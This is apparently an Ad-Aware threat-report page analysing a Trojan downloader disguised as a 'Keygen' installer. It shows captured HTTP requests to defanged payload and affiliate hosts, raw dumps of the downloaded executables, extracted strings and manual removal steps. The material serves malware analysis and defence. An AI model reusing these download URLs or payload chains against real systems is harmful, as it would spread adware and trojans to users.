RE>.Generated by cloudfront (CloudFront).Request ID: fcSbLmuhz8cR-i
4lAtzvgkN_qhOhk-6z6GB45hgOyMYiGEYAYy_ADQ==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..



GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 03 Mar 2016 15:50:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02754-102fdbd3abcdce268f32d0cda9cb4a-1006-4-0-0-0-0-UA-0-3131-31323237-35353836393433-30-30-30-194.242.96.218-20160303105052-_-7F2D731E05743562753D171E4F1D3E55296362694B422706036B6771166C070C1B1F021E6C1412026D; expires=Sat, 02 Apr 2016 15:50:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 27 Jan 2019 02:30:52 GMT; path=/;
tracking_id: 102fdbd3abcdce268f32d0cda9cb4a
X-Robots-Tag: noindex, nofollow
Content-Length: 438
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up.afiledownload27.space/offer.php?affId=1006&trackin
gId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda
9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=
1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.
</p>.</body></html>...
<<< skipped >>>


GET hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 449064
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:42 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HuCadYZSIzWlvzDTFzMDMjZhsOtPGL2BsvIq4c9oQrq8NQsW9Vmiuw==
w..;A.I....E...}.....k.0.."(.P.M..........,7Dn.X....i.?;v. ..Kw..e....
&.Jk..`...../..Z/.Eqe..E..JZ.h.#..Y...(..D)e.a<.....d..(........g`.
....m.....g %O..{...s..H....?/...LH........3....=..............&]P`r..
Z:.....Y.Q.}....#0.LF........tZ4..5Bh.....K*..E....z. P.i....TV..9....
]................^.w0.~.y.N>....Gx$.G.....A].l_....)ny.5<..0....
%t7.!.f.o6..)...N._..dz|.0.9.m...b.0._.eW..FB....FN{.[.$..Y...#......I
.....H.n..X..U..a.S......Z..r..Y..6.....q.Fz.......;.T..[.*\Tv.9...0.v
.$&..9z.fJ`].?C....?.0p.G.._.J.#.7.(......Wp=e...f..*...Cm.......N...I
4...*q...*..9.8...?....0.....f......=.\C......fSQ..Nik...UY..i.....?G.
#... .%.1GE,.@!p..6l.b-.J=.R..... *.g...T.}.....a/X.V..v%.B..77.H.c.!.
K.N.........<8D\..r...Gz.3................2$....!...u..9..... ....\
.V.T.;(O3.>'....E....)3,.......G.....m.. .]...AM....)..N4(O.....8..
.)...._e...pq...T.........t...(4.].i...m./e..w. c.."..W.' .d.o. .j..\.
X.&'.G....."..0......Vp#/.3[... .d?..Ej..[%....`.%[email protected]'....
G.tg....QdK..ic.."jb}.V0...a[......4s|h"U&.3:.K..(...\..!.<.1.6.tVD
]a{c{P.....W\W.......L.7.bP.^ ...Tde.R.oW&...........f..j..Qf5{H.%R.8&
gt;.Z...F\?f.ga.....f......g$(..I.Sy .?....'....&$...T^D....u..z.....*
I....>.!....pU..[..C.........p.....WLir.t..........*=....v....U....
@..^[email protected].,...C\r.m
..~...<Y..L[..i...-Y.!...........-L.=Rx?61..tk.Hu..l?.H._..8.`b....
.$.|.b.....,......n...._.d.........?.E.;.G!....<..........X'D.C....
Ry..E......D.S..26...`.m........pB..z...]...2Y...F.0...........)aD
<<< skipped >>>


POST hXXp://up.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 03 Mar 2016 15:50:53 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 5fc330730b7a22af558c1164ae769565.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tNsNM1aNbcM0KoODe9kGS9m1N-HGAxAuhLVn_ggzeC6x7f3K76u3Lg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: tNsNM1aNbcM0Ko
ODe9kGS9m1N-HGAxAuhLVn_ggzeC6x7f3K76u3Lg==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..



GET hXXp://up.afiledownload27.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 585
Connection: close
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:40 GMT
X-Cache: Miss from cloudfront
Via: 1.1 f7cf1cf41b6eacdcf79cd9a0aa1d0179.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xKvW7Y5wBHS4K6qQo8kFW5Tf9RcNfIDQBlfll2Men8pkGha0HDbWkA==
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=100
6&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&a
mp;aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.s
pace/offer.php?affId={aff_id}&trackingId=11717601&
instId=11&ho_trackingid={transaction_id}&cc={
country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac
=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a&g
t;</body>..



GET /?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.slfdio83rh.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 152576
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 03 Mar 2016 15:50:38 GMT
X-Cache: Miss from cloudfront
Via: 1.1 b098e6f4643cebda4b3dc6797be9944c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gwXX0eQJ_CpFZMUooBBpCVGBpTa5ZjcC4-d1SxA9ULJwswCOnNPyEw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........<...]...
]...].......].... ..]....!..]...%S..]...]...]....%..].......]...]W..].
......]..Rich.]..........................PE..L...Y'.V.................
t........................@.......................................@....
.............................$...<[email protected]......................`.
..................................8...@...............................
.............text...kr.......t.................. ..`.rdata...c.......d
...x..............@[email protected]...@[email protected]...
[email protected]..................@[email protected]..`............B..............@.
.B....................................................................
......................................................................
......................................................................
......................................................................
..................................................h`.A..e...Y.....hP.A
[email protected]$..V......A.t.V.`........^.....D$..T$...
.H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2....................
.D$.;H.u...;D$.u......2............A............QV.t$..D$......a....t$
.........A..E..F......F.........:.u.3.QR...K.....^Y.....W.y...A..u. ._
QR... .....^Y..........A............Q.D$...$....V.t$....u&j..F........
F.....h..A...........^Y...PV.=.....^Y............A............QV.t$..D
$...........t$.........A..E..F......F.........:.u.3.QR...k.....^Y.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_468:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\whIkaR9Rme.exe
zip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp
p?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
nsj2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\29ufGoaPqW
evenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
l.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201603031547
hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_468_rwx_10004000_00001000:

callback%d

whIkaR9Rme.exe_564:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
O8,reA
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe"
61/SevenZip_downloader-Q0i7uvJmR.exe
ducturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe"")
ISdl.dll"
up19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
Keygen Setup
1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\182741632
461/SevenZip_downloader-Q0i7uvJmR.exe
oader-Q0i7uvJmR.exe
cli/1457017331461/SevenZip_downloader-Q0i7uvJmR.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp\whIkaR9Rme.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj2.tmp
whIkaR9Rme.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
6776174
hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11
9xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943
nloader-Q0i7uvJmR.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic=

whIkaR9Rme.exe_564_rwx_10001000_00007000:

.text
`.rdata
@.data
.rsrc
@.reloc
/key=

cpSetup.exe_380:

.text
`.rdata
@.data
.rsrc
@.reloc
.PexP
d.dEta$
.VsrG
.,%Ub
Ia.HpTP$InPerJetaxpHorAr
"[email protected]"
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
name='Microsoft.Windows.Common-Controls' version='6.0.0.0'
processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />
1 1$1(14181<1
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst4.tmp\cpSetup.exe

cpSetup.exe_380_rwx_003A0000_0000D000:

.text
`.rdata
@.data
.rsrc
@.reloc
/%C-^.
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\cpSetup.exe (14751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\182741632 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\29ufGoaPqW (116 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (116 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00081064.a (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0008169e.a (1730 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now